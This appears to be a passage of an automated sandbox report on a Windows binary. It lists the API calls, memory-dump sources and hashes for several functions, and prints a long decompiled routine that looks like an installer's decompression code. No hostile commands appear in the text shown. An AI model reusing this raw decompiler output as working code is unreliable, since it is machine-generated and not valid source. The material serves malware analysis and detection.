                                          0x00402084
                                          0x00402088
                                          0x0040208e
                                          0x00402098
                                          0x0040209a
                                          0x004020a5
                                          0x004020a8
                                          0x004020b5
                                          0x004020b7
                                          0x004020b9
                                          0x004020c0
                                          0x004020c3
                                          0x004020c3
                                          0x004020c6
                                          0x004020d0
                                          0x004020d8
                                          0x004020dd
                                          0x004020e9
                                          0x004020e9
                                          0x004020ec
                                          0x004020f5
                                          0x004020f8
                                          0x00402101
                                          0x00402106
                                          0x00402118
                                          0x00402127
                                          0x00402129
                                          0x00402135
                                          0x00402135
                                          0x00402127
                                          0x00402137
                                          0x0040213d
                                          0x0040213d
                                          0x00402140
                                          0x00402146
                                          0x0040214b
                                          0x00402160
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040214b
                                          0x00402156
                                          0x00402880
                                          0x0040288c

                                          APIs
                                          • CoCreateInstance.OLE32(00407490,?,00000001,00407480,?), ref: 00402065
                                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409370,00000400,?,00000001,00407480,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040211F
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp, xrefs: 0040209D
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ByteCharCreateInstanceMultiWide
                                          • String ID: C:\Users\user\AppData\Local\Temp
                                          • API String ID: 123533781-2935972921
                                          • Opcode ID: 2ca65707f57f31f88cc6a7fd1c1688d70cf0f88a2c7737c03cbde538d7105c3f
                                          • Instruction ID: 24f6ed1ac1c0c168ca35b22597f39d8cd9e85fbc7861a3d68fdd8e416dd3802a
                                          • Opcode Fuzzy Hash: 2ca65707f57f31f88cc6a7fd1c1688d70cf0f88a2c7737c03cbde538d7105c3f
                                          • Instruction Fuzzy Hash: E2414DB5A00104AFCB00DFA4CD89E9E7BB9EF49354B20416AF505EB2E1DA79ED41CB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1000F001, Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 1000F006
                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 1000F00F
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: 994bc7c316b827b003faaf09e58e97cf16d3ec543e89b8db0b1006eb23b57c03
                                          • Instruction ID: 5030dc23641c71159e9771395754a92d4456f8d54d63a5637adc76bae9f1ee9b
                                          • Opcode Fuzzy Hash: 994bc7c316b827b003faaf09e58e97cf16d3ec543e89b8db0b1006eb23b57c03
                                          • Instruction Fuzzy Hash: E6B09232044258EBEA022BE1DC49B983FA8EB0A762F008010F60D44060CB729594AAA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00402630, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 39%
                                          			E00402630(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E004029E8(2), _t19 - 0x1a4) != 0xffffffff) {
					E00405889(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E0040592B();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                          0x00402648
                                          0x0040265c
                                          0x00402667
                                          0x00402668
                                          0x004027a3
                                          0x0040264a
                                          0x0040264a
                                          0x0040264c
                                          0x0040264e
                                          0x0040264e
                                          0x00402880
                                          0x0040288c

                                          APIs
                                          • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040263F
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: FileFindFirst
                                          • String ID:
                                          • API String ID: 1974802433-0
                                          • Opcode ID: 0eff392dd80b659ea035236535e3ff8102da578794157fa10522713e52998ada
                                          • Instruction ID: 00d369c81b6f5d5ac2b66fc3ece6c10e84ddf32e85f5a3588956fe302b8fe543
                                          • Opcode Fuzzy Hash: 0eff392dd80b659ea035236535e3ff8102da578794157fa10522713e52998ada
                                          • Instruction Fuzzy Hash: 18F0A0726081009EE700EBB59949EFEB768DF21324F6045BBF111B20C1C3B88946DA2A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1000D38C, Relevance: .3, Instructions: 345COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                          • Instruction ID: cf1c5a0dcfeb6e63cb25c33ea0a670466eff0bab16aa7ee488cd36ac7b91e0c5
                                          • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                          • Instruction Fuzzy Hash: 84C175322091930AEB4DD67D843453FBAE2DB926F131707AEE8B6CB1D8EE20D564D520
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1000D7C1, Relevance: .3, Instructions: 341COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                          • Instruction ID: 04b93e2ad820f54a838cf396598bd4dcb0369557c165c582704f5abea7fcec7b
                                          • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                          • Instruction Fuzzy Hash: DDC152322091934AEB5DD67D843453FBAE29F926F131707AEE4B6CB1D9EE20C524D620
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406043, Relevance: .3, Instructions: 334COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 79%
                                          			E00406043(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E004067B2( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x407374; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x407374; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E0040681A( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M00406772))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x409340 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x409340 + __eax * 2) & 0x0000ffff =  *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x409340 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x409340 + __eax * 2) & 0x0000ffff =  *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E004067B2( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E004067B2( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x42daf0;
												if( *0x42daf0 != 0) {
													L22:
													_t412 =  *0x409364; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x409368; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x42c96c; // 0x0
													_t446[5] = _t414;
													_t415 =  *0x42c968; // 0x0
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L180;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x42c970;
													goto L15;
													L20:
													 *_t416 = _t438;
													_t416 = _t416 + 4;
													__eflags = _t416 - 0x42cdf0;
													if(_t416 < 0x42cdf0) {
														L15:
														__eflags = _t416 - 0x42cbac;
														_t438 = 8;
														if(_t416 > 0x42cbac) {
															__eflags = _t416 - 0x42cd70;
															if(_t416 >= 0x42cd70) {
																__eflags = _t416 - 0x42cdd0;
																if(_t416 < 0x42cdd0) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														goto L20;
													} else {
														E0040681A(0x42c970, 0x120, 0x101, 0x407388, 0x4073c8, 0x42c96c, 0x409364, 0x42d270, _t448 - 8);
														_push(0x1e);
														_pop(_t440);
														_push(5);
														_pop(_t419);
														memset(0x42c970, _t419, _t440 << 2);
														_t450 = _t450 + 0xc;
														_t442 = 0x42c970 + _t440;
														E0040681A(0x42c970, 0x1e, 0, 0x407408, 0x407444, 0x42c968, 0x409368, 0x42d270, _t448 - 8);
														 *0x42daf0 =  *0x42daf0 + 1;
														__eflags =  *0x42daf0;
														goto L22;
													}
												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L180;
											}
											L8:
											if(_t423 != 1) {
												goto L180;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x10;
												if(__ebx >= 0x10) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L182;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E004055C3( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L180;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
